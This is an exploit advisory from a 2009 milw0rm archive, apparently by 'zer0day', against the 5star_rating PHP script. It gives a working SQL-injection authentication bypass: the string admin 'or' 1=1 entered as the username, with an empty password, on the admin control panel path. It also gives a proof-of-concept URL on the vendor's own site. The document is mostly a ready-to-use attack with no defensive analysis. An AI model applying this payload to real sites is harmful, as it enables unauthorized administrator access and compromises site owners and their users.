@@@@@@@@  @@@@@@@@  @@@@@@@    @@@@@@@@   @@@@@@@    @@@@@@   @@@ @@@
@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@ @@@
     @@!  @@!       @@!  @@@  @@!   @@@@  @@!  @@@  @@!  @@@  @@! !@@
    !@!   !@!       !@!  @!@  !@!  @!@!@  !@!  @!@  !@!  @!@  !@! @!!
   @!!    @!!!:!    @!@!!@!   @!@ @! !@!  @!@  !@!  @!@!@!@!   !@!@!
  !!!     !!!!!:    !!@!@!    !@!!!  !!!  !@!  !!!  !!!@!!!!    @!!!
 !!:      !!:       !!: :!!   !!:!   !!!  !!:  !!!  !!:  !!!    !!:
:!:       :!:       :!:  !:!  :!:    !:!  :!:  !:!  :!:  !:!    :!:
 :: ::::   :: ::::  ::   :::  ::::::: ::   :::: ::  ::   :::     ::
: :: : :  : :: ::    :   : :   : : :  :   :: :  :    :   : :     :
--[ Informations ]------------------------------------------------------
@author : zer0day (zer0day@vodkaorange.com)
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html
--[ Exploit ]-----------------------------------------------------------
---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password
You are logged in Administrator !
Simply ?
--[ Proof Of Concept ]--------------------------------------------------
http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php
--[ End Of File ]-------------------------------------------------------
# milw0rm.com [2009-04-22]